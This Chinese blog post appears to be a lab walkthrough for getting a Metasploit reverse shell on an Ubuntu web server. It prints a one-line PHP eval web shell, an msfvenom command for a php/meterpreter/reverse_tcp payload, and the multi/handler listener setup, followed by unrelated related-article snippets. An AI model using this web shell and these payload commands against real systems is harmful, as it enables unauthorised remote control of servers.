MSF回弹木马ubuntu测试

news/2024/11/13 9:20:34/

网站地址为192.168.104.128

web.php内容为:

<?php eval($_POST[123]);
?>

linux版本信息:20.04.1-Ubuntu

nginx信息:nginx-1.21.6

php信息:PHP 7.3.33-19

php-fpm信息:/etc/php/7.3/fpm/php-fpm.conf

一、使用蚁剑连接网站

在此页面,我们可以查看当前网页的文件,但是无法访问其他页面(权限不够)

我们可以右键打开虚拟终端来查看自己的权限

二、反弹性木马

1)生成木马文件webreverse.php

msfvenom -p  php/meterpreter/reverse_tcp  LHORT=192.168.104.128 LPOST=12345 -f php -o shellreverse.php 

其内容为:

2)上传webreverse.php至网站

可以使用命令来传递文件

python3 -m http.server 999

在蚁剑中,我们选择右键上传文件,但是因为权限问题,会导致文件上传失败。所以可以选择降低目录权限或提高自己的权限

降低目录的权限:

此时上传webreverse文件

因为该php文件是一个反弹型木马,受害者会连接攻击者,所以需要我们去监听

3)监听端口

msfconsole  
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.104.131
set lport 12345
exploit

访问192.168.104.128的shellreverse.php时,这台受害主机就会连接到我们的攻击主机中

4)提权

此时我们的权限是比较低,所以需要在此进行提权


http://www.ppmy.cn/news/1504220.html

相关文章

AUTOSAR实战教程 - 模式管理BswM与其他各模块的交互

近日驻厂某OEM,幸得大块的个人时间, 把BswM这一块的内容从ETAS/ISOLAR工具配置到代码实现做了一个全方位的CT. 2024,希望孜孜内卷的汽车人升职加薪!博主近期写的一首小诗,也一并送给大家,懂的都懂: 在看不到阳光的冬天/ 我染了风寒/ 白天点灯/ 晚上吃药/ 躺在被窝里才敢咳…

用的到linux-tomcat端口占用排查-Day5

前言&#xff1a; 最近使用tomcat搭建了一套测试环境的应用&#xff0c;整个搭建过程也很简单&#xff0c;就是将部署包上传至服务器☞解压☞启动tomcat服务器&#xff0c;当然服务器也是成功启动了&#xff0c;但是发现前端应用报404&#xff0c;具体如下图所示。 一、现象及思…

【Linux-WMware Tools安装失败“segmentation fault”解决方法】

VMware版本&#xff1a;17 Ubuntu版本: 22.04 安装常规办法&#xff0c;通过vmware安装Tool&#xff0c;安装显示报错&#xff1a;“segmentation fault”&#xff0c;查了下可能是tool和ubuntu版本不兼容导致的。解决办法&#xff1a;通过命令行逐次安装。 1、sudo apt insta…

nginx负载均衡、java、tomcat装包

一、nginx 七层负载均衡 1、七层负载均衡基础配置 2、负载均衡状态 [rootserver]# vim /usr/local/nginx/conf/nginx.confworker_processes 1;event {worker_connections 1024&#xff1b;}http { # 七层负载均衡支持http、ftp协议include mime.types;default_type app…

手把手教你入门vue+springboot开发(十一)--token详细解读

文章目录 前言一、后端代码解读二、前端代码解读总结前言 JWT是一种在web应用中广泛使用的令牌格式,用于在用户和服务器之间传递安全可靠的信息。JWT通常包含了用户的身份信息和一些其他的元数据,被用作身份验证和授权。因此,人们经常将JWT简称为令牌(token)。本篇我们结…

android 音频播放器,(二)SoundPool简介

1.SoundPool概述 SoundPool类管理和播放低延迟音频资源。SoundPool还管理一次渲染的音频流的数量&#xff0c;构造SoundPool对象时&#xff0c;maxStreams参数为从单个SoundPool播放的最大流数。 设置非零循环值&#xff0c;可以循环播放声音。值为-1声音永远循环&#xff0c;这…

计算机网络面试题3

四次挥手 断开连接需要四次挥手 1.客户端发送一个FIN(SEQx&#xff09;标志的数据包到服务端&#xff0c;用来关闭客户端到服务端的数据传送&#xff0c; 然后客户端进入FIN-WAIT-1状态。 2.服务端收到一个FIN(SEQx&#xff09;标志的数据包&#xff0c;它…

设计模式 之 —— 抽象工厂模式

目录 什么是抽象工厂模式&#xff1f; 定义 特点 抽象工厂模式&#xff08;java代码示例&#xff09; 首先定义第一个接口 实现第一个接口的类 定义第二个接口 实现第二个接口的类 * 创建抽象工厂类 创建扩展了 AbstractFactory 的工厂类 饮料工厂 食物工厂 * 创建一个…